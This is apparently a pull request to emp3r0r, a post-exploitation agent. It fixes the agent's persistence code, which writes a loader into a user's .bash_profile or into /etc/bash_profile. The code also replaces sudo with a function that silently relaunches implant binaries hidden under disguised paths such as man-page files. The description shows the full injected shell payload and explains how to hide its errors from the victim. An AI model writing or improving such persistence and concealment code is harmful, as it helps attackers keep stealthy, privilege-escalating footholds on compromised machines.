### PR TITLE
fix: persistence using profiles

### DIFF
--- a/core/lib/agent/persistence.go
+++ b/core/lib/agent/persistence.go
@@ -137,8 +137,8 @@ func profiles() (err error) {
 	}
 
 	// source
-	bashprofile := fmt.Sprintf("%s/.bashrc", user.HomeDir)
-	sourceCmd := "source ~/.bashprofile"
+	bashprofile := fmt.Sprintf("%s/.bash_profile", user.HomeDir)
+	sourceCmd := "source ~/.bash_profile"
 	if HasRoot() {
 		bashprofile = "/etc/bash_profile"
 		sourceCmd = "source /etc/bash_profile"
@@ -168,7 +168,7 @@ func profiles() (err error) {
 		sudoLocs = append(sudoLocs, "/usr/bin/sudo -E "+loc)
 	}
 	sudoPayload := strings.Join(sudoLocs, "||")
-	loader += fmt.Sprintf("\nfunction sudo() { /usr/bin/sudo $@; (set +m;(%s 2>/dev/null)) }", sudoPayload)
+	loader += fmt.Sprintf("\nfunction sudo() { /usr/bin/sudo $@; (set +m;((%s) 2>/dev/null)) }", sudoPayload)
 	err = os.WriteFile(bashprofile, []byte(loader), 0644)
 	if err != nil {
 		return


### PR DESCRIPTION
Hi, this PR fixes two things:
1. I believe you meant `.bash_profile` on line 140. emp3r0r currently tries to source `.bashprofile` from `.bashrc` and other profile files. However `.bashprofile` doesn't exist and the payload gets written to `.bashrc` instead.
2. On line 171, need to enclose `%s` in parentheses so all of `%s` has stderr silenced. Currently only the last command's output gets redirected and this causes visible errors.
```bash
export PERSISTENCE=true
set +m;/home/test-ss/.less-hist 2>/dev/null
function sudo() { /usr/bin/sudo $@; (set +m;(/usr/bin/sudo -E /env||/usr/bin/sudo -E /usr/bin/x||/usr/bin/sudo -E /usr/bin/.env||/usr/bin/sudo -E /usr/local/bin/env||/usr/bin/sudo -E /bin/.env||/usr/bin/sudo -E /usr/share/man/man1/arch.gz||/usr/bin/sudo -E /usr/share/man/man1/ls.1.gz||/usr/bin/sudo -E /usr/share/man/man1/arch.5.gz 2>/dev/null)) }
```
^ So right now only `/usr/bin/sudo -E /usr/share/man/man1/arch.5.gz` has stderr redirected into /dev/null.